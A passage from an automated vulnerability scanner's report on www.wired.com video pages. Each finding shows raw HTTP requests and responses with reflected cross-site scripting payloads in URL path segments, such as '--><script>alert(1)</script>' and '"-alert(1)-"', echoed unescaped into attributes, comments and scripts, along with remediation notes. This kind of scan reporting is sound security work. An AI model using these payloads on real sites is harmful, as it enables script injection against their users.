The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6bf"><a>d952bced43f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video6d6bf"><a>d952bced43f/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29421
Vary: Accept-Encoding
Cache-Control: max-age=273
Expires: Mon, 22 Nov 2010 00:38:54 GMT
Date: Mon, 22 Nov 2010 00:34:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video6d6bf"><a>d952bced43f ss_latest-videos c_latest">
...[SNIP]...

1.1109. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 55abb--><script>alert(1)</script>39448b1449 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video55abb--><script>alert(1)</script>39448b1449/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29458
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:25 GMT
Date: Mon, 22 Nov 2010 00:35:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video55abb--><script>alert(1)</script>39448b1449/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001
-->
...[SNIP]...

1.1110. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb87"><a>3c05f69f86c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos2eb87"><a>3c05f69f86c/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:30 GMT
Date: Mon, 22 Nov 2010 00:35:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106757


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos2eb87"><a>3c05f69f86c c_latest">
...[SNIP]...

1.1111. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cb36"-alert(1)-"8e4a84dbfce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos6cb36"-alert(1)-"8e4a84dbfce/latest/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:38 GMT
Date: Mon, 22 Nov 2010 00:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer","latest","1815816633","latest-videos6cb36"-alert(1)-"8e4a84dbfce","681412282001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1112. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ef3"><a>5441048f7e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest37ef3"><a>5441048f7e0/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:44 GMT
Date: Mon, 22 Nov 2010 00:36:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest37ef3"><a>5441048f7e0">
...[SNIP]...

1.1113. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67547"-alert(1)-"25f8c3ce3fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest67547"-alert(1)-"25f8c3ce3fd/1815816633/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=271
Expires: Mon, 22 Nov 2010 00:42:11 GMT
Date: Mon, 22 Nov 2010 00:37:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer","latest-videos","latest67547"-alert(1)-"25f8c3ce3fd","1815816633","681412282001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1114. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97411"-alert(1)-"560ba4b52d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663397411"-alert(1)-"560ba4b52d/cowboys-and-aliens-trailer/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:55 GMT
Date: Mon, 22 Nov 2010 00:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "cowboys-and-aliens-trailer","latest-videos","latest","681412282001","181581663397411"-alert(1)-"560ba4b52d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1115. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5709"-alert(1)-"f9b8b940f08 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailera5709"-alert(1)-"f9b8b940f08/681412282001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:21 GMT
Date: Mon, 22 Nov 2010 00:38:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","681412282001","cowboys-and-aliens-trailera5709"-alert(1)-"f9b8b940f08","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1116. http://www.wired.com/video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/681412282001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26356"-alert(1)-"ad495767de was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/cowboys-and-aliens-trailer/68141228200126356"-alert(1)-"ad495767de HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:30 GMT
Date: Mon, 22 Nov 2010 00:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "68141228200126356"-alert(1)-"ad495767de","cowboys-and-aliens-trailer","latest-videos","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1117. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa19"><a>84501b99538 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video8fa19"><a>84501b99538/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29448
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:42 GMT
Date: Mon, 22 Nov 2010 00:39:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video8fa19"><a>84501b99538 ss_latest-videos c_latest">
...[SNIP]...

1.1118. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2a912--><script>alert(1)</script>d33d36d23a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video2a912--><script>alert(1)</script>d33d36d23a9/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29487
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:45:35 GMT
Date: Mon, 22 Nov 2010 00:40:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video2a912--><script>alert(1)</script>d33d36d23a9/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001
-->
...[SNIP]...

1.1119. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7290d"><a>06334098279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos7290d"><a>06334098279/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=295
Expires: Mon, 22 Nov 2010 00:45:37 GMT
Date: Mon, 22 Nov 2010 00:40:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos7290d"><a>06334098279 c_latest">
...[SNIP]...

1.1120. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46a9"-alert(1)-"65be922ee1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videosb46a9"-alert(1)-"65be922ee1d/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:40 GMT
Date: Mon, 22 Nov 2010 00:41:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "danny-boyle-traps-james-franco-in-chasm-for-127-hours","650949108001","latest","1815816633","latest-videosb46a9"-alert(1)-"65be922ee1d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1121. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f235"><a>b8db29e0880 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest9f235"><a>b8db29e0880/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
